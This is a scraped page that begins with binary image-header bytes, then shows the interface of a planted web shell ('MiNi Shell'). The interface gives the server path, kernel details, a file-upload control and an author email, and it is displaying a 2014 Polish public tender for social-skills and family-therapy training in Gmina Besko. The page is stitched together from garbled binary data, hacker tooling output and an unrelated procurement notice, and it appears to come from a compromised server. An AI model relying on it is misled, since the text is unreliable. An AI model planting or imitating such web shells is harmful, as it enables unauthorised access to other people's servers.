JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140128/31584-N-2014.html

<p class="kh_header"><b>Jedlicze: Kompleksowe zorganizowanie i przeprowadzenie szkoleń w ramach projektu systemowego Czas na aktywność w Gminie Besko</b><br>
<b>Numer ogłoszenia: 31584 - 2014; data zamieszczenia: 28.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Rynek 5, 38-460 Jedlicze, woj. podkarpackie, tel. 13 44 84 758, faks 13 43 52 117.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.gops.besko.pl/asp/pl_start.asp?ref=1&typ=13&menu=3&strona=1</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe zorganizowanie i przeprowadzenie szkoleń w ramach projektu systemowego Czas na aktywność w Gminie Besko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności:
1.Zamówienie realizowane jest w ramach projektu systemowego Czas na aktywność w gminie Besko realizowanego w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VII Promocja integracji społecznej DZIAŁANIE 7.1 Rozwój i upowszechnianie aktywnej integracji PODDZIAŁANIE 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, dofinansowanego ze środków UNII EUROPEJSKIEJ w ramach EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO.
2.Przedmiotem zamówienia jest kompleksowe zorganizowanie i przeprowadzenie szkoleń w ramach projektu systemowego Czas na aktywność w gminie Besko
3.Zamówienie obejmuje szkolenia w zakresie:


ROK - 2014

Zadanie I - Trening kompetencji życiowych i umiejętności społecznych -7 osób w tym 6 kobiet i 1 mężczyzna na rok 2014 

Liczba uczestników: 7 osób, w tym 6 kobiet  i 1 mężczyzna   

1. Czas trwania: 48 h - 6 dni po 8h realizowanych od poniedziałku do piątku, do których wlicza się zarówno czas realizacji zajęć edukacyjnych, jak i przerwy między zajęciami nie później niż do godz.15.30.

2. Termin realizacji: 01.03.2014r. - 30.04.2014 r. Dokładny termin realizacji treningu Zamawiający ustali z Wykonawcą zamówienia.

3. Cel szkolenia: przełamanie indywidualnych barier, wzmocnienie komunikacji i funkcjonowania w grupie, elementy komunikacji interpersonalnej. Poruszenie tematyki roli mężczyzny i kobiety w rodzinie, świadomość roli jaka odgrywa mężczyzna w rodzinie

Zadanie 2. Terapia rodzinna- Liczba uczestników:7 osób w tym 6 kobiet  i 1 mężczyzna na rok 2014

1.Czas trwania: 48 h -6 dni po 8h realizowanych od poniedziałku do piątku, do których wlicza się zarówno czas realizacji zajęć edukacyjnych, jak i przerwy między zajęciami nie później niż do godz.15.30.

2.Termin rozpoczęcia: od 01.03.2014r. do 30.04.2014r.Dokładny termin rozpoczęcia warsztatu Zamawiający ustali z Wykonawcą zamówienia.

3.Cel szkolenia: przełamanie indywidualnych barier, wzmocnienie komunikacji i funkcjonowania w grupie, elementy komunikacji interpersonalnej. Poruszenie tematyki roli mężczyzny i kobiety w rodzinie, świadomość roli jaką odgrywa mężczyzna w rodzinie

      ROK - 2015

Zadanie 1. Trening kompetencji życiowych i umiejętności społecznych- 5 osób w tym 3 kobiety i 2 mężczyzn na rok 2015

1.Czas trwania: 48 h - 6 dni po 8h realizowanych od poniedziałku do piątku, do których wlicza się zarówno czas realizacji zajęć edukacyjnych, jak i przerwy między zajęciami nie później niż do godz.15.30.
2.Termin realizacji: od 01.01.2015- do 28.02.2015r. Dokładny termin rozpoczęcia treningu Zamawiający ustali z Wykonawcą zamówienia.
3.Cel szkolenia: przełamanie indywidualnych barier, wzmocnienie komunikacji i funkcjonowania w grupie, elementy komunikacji interpersonalnej. Poruszenie tematyki roli mężczyzny i kobiety w rodzinie, świadomość roli jaka odgrywa mężczyzna w rodzinie


Zadanie 2. Terapia rodzinna-  Liczba uczestników: 5 osób w tym 3 kobiety  i 2 mężczyzn na rok 2015

1.Czas trwania: 48 h -6 dni po 8h realizowanych od poniedziałku do piątku, do których wlicza się zarówno czas realizacji zajęć edukacyjnych, jak i przerwy między zajęciami nie później niż do godz.15.30.
2.Termin realizacji: od 01.01.2015r. - do 28.02.2015r. Dokładny termin rozpoczęcia warsztatu Zamawiający ustali z Wykonawcą zamówienia.
3.Cel szkolenia: przełamanie indywidualnych barier, wzmocnienie komunikacji i funkcjonowania w grupie, elementy komunikacji interpersonalnej. Poruszenie tematyki roli mężczyzny i kobiety w rodzinie, świadomość roli jaką odgrywa mężczyzna w rodzinie


Zakres: zajęcia winny mieć charakter warsztatowo - treningowy, gwarantujący czynny udział uczestników oraz ich osobiste zaangażowanie. Nacisk powinien być położony na ćwiczenie konkretnych umiejętności społecznych, np. bycia asertywnym w różnych sytuacjach życiowych, na przygotowanie do rozmowy o pracę pozwalające nabyć umiejętność rozmowy z potencjalnym pracodawcą, a nawet uwzględniające kwestie zewnętrznej autoprezentacji. 


Wymagania dotyczące obydwóch zadań:

1.zapewnienie kadry dydaktycznej posiadającej kwalifikacje zawodowe odpowiednie do prowadzenia zajęć objętych programem warsztatów: psycholog, socjoterapeutka, pedagog.
2.program szkolenia zawierający w szczególności: czas trwania i sposób organizacji zajęć, cele kształcenia a także plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i praktycznej oraz niezbędnych środków czy materiałów dydaktycznych.
3.zapewnienie materiałów i pomocy dydaktycznych (broszur, opracowań własnych) potrzebnych do przyswojenia wiedzy teoretycznej, a także innych materiałów szkoleniowych i sprzętu niezbędnego do zajęć (np. zeszyt, długopis, projektor multimedialny itp.),
4.zapewnienie odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych wyposażonego w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizacje zajęć, 
5.przekazanie Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych oznakowanych zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki(wymaganych przez podmioty kontrolujące).
6.ubezpieczenie uczestników zajęć od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca kursu - od pierwszego do ostatniego dnia kursu (kserokopia polisy potwierdzoną za zgodność z oryginałem należy przekazać Zamawiającemu przed rozpoczęciem kursu),
7.zapewnienie codziennego cateringu w postaci ciepłych i zimnych napojów (kawa, herbata, soki, woda wg potrzeb uczestników), ciastek bądź kanapek oraz gorącego posiłku (II danie obiadowe) w przypadku zajęć powyżej 6 godz.
8.prowadzenie bieżącej dokumentacji przebiegu kształcenia (m.in. listy obecności uczestników zajęć - potwierdzanie obecności za pomocą własnoręcznego czytelnego podpisu, potwierdzenia odbioru materiałów szkoleniowych, potwierdzenia otrzymania zimnego oraz gorącego poczęstunku w postaci gorącego posiłku, kserokopii dziennika zajęć, ankiet a po zakończeniu warsztatu przekazania oryginałów tych dokumentów Zamawiającemu wraz z kserokopiami zaświadczeń lub certyfikatów potwierdzających ukończenie warsztatu (z odpowiednim oznakowaniem promocyjnym),
9.niezwłoczne poinformowanie Zamawiającego (najpóźniej w następnym dniu od zaistniałej sytuacji) o absencji uczestników kursu lub rezygnacji z uczestnictwa  w trakcie jego trwania, a także innych okoliczności mających wpływ na realizację programu nauczania. Zgłoszenia o nieobecności uczestników powinny być dokonywane telefonicznie oraz e-mailowo do Koordynatora projektu,
10.	zajęcia w ramach warsztatów zasadniczo winny odbywać się w pomieszczeniach zagwarantowanych przez Wykonawcę na terenie Gminy Besko i spełniać określony standard (odpowiednie warunki szkoleniowe, oprawa gastronomiczna -sala szkoleniowa oraz zaplecze gastronomiczne o podwyższonym standardzie).
11.Przekazanie Zamawiającemu harmonogramu zajęć wraz z godzinami rozpoczęcia i zakończenia kursu przed rozpoczęciem zajęć każdej grupy uczestników.
12.Po zakończeniu realizacji zamówienia Wykonawca przedłoży Zamawiającemu sprawozdanie z przebiegu przeprowadzonych szkoleń realizowanych w ramach zamówienia wraz z protokołem zdawczo odbiorczym usługi. Przeprowadzenie ewaluacji szkolenia/kursu - dokonanie oceny szkolenia/kursu za pomocą ankiet ewaluacyjnych (wstępne i końcowe);
13.Zamawiający zastrzega sobie prawo dokonywania kontroli realizacji zamówienia, a Wykonawca zobowiązany jest do zapewnienia udziału w szkoleniach osobom wskazanym przez Zamawiającego do przeprowadzenia kontroli realizacji przedmiotu zamówienia. 
14.Wykonawca pokryje koszty dojazdu uczestników z terenu gminy Besko..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że są wpisani do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę instytucji szkoleniowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, na rzecz osób bezrobotnych, co najmniej po trzy usługi szkoleniowe w każdym z wymienionych poniżej dwóch (2) zakresów:
rozwój kompetencji społecznych lub kompetencji życiowych,
terapia rodzinna lub praca z rodziną,
Każda z usług szkoleniowych ma być zrealizowana w wymiarze co najmniej 3 dni szkoleniowych (gdzie dzień szkoleniowy wynosił co najmniej 6 godz. dydaktycznych - gdzie 1 godz. dydaktyczna = co najmniej 45 min. zegarowych) i każda ma być zrealizowana dla co najmniej 5 osób. Usługi te (zakresy tematyczne) mogły być realizowane w ramach wielu umów lub w ramach jednej umowy.
Posiadane doświadczenie powinno być udokumentowane złożeniem wykazu zrealizowanych usług zgodnie ze wzorem stanowiącym Załącznik nr 4 do SIWZ wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie następującymi osobami zdolnymi do wykonania zamówienia:
- co najmniej 2 trenerów posiadających doświadczenie przy przeprowadzeniu co najmniej 2 szkoleń ( każdy) dla osób bezrobotnych, w wymiarze co najmniej po 24 godz. dydaktyczne każde, o tematyce odpowiadającej przedmiotowi zamówienia określonemu w pkt . 3.2 SIWZ ( tj. trening kompetencji życiowych i lub umiejętności społecznych i terapia rodzinna praca z rodziną).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana treści umowy
1.Zamawiający przewiduje możliwość zmiany treści Umowy w przypadku, gdy:
1)nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy;
2)wystąpi konieczność zmiany miejsca i terminów realizacji szkoleń, wyłącznie w przypadku zaistnienia nowych okoliczności, niezależnych od Zamawiającego i Wykonawcy, których nie można było przewidzieć;
2.Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.gops.besko.pl/asp/pl_start.asp?ref=1&typ=13&menu=3&strona=1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Besku ul. Podkarpacka 5 , 38-524 Besko, pokój nr 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2014 godzina 10:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Besku ul. Podkarpacka 5 , 38-524 Besko, pokój nr 5..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com